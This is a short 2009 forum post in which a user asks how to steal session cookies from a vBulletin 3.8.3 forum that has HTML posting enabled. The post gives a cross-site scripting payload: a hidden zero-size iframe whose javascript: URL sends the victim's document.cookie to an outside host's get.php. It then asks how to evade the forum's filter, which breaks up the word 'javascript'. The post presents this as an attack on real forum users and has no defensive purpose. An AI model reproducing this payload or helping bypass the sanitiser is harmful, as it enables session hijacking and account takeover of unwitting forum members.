Is it possible to get session cookies from vBulletin with HTML on?
Date: October 30, 2009 12:59AM
I want to get session cookies from a vBulletin Forum Version 3.8.3 with "HTML-Code is on".
I want to use an iFrame to hide everything.
My code looks like this:
<iframe frameborder=0 height=0 width=0 src=javascript:void(document.location="http://xxxxxxxxx.com/get.php?c="+document.cookie)></iframe>
Here's my problem:
Everytime I preview the post, vBulletin makes a <b> tag in the code like this:
javascript<b></b>:void
Is there a way around this?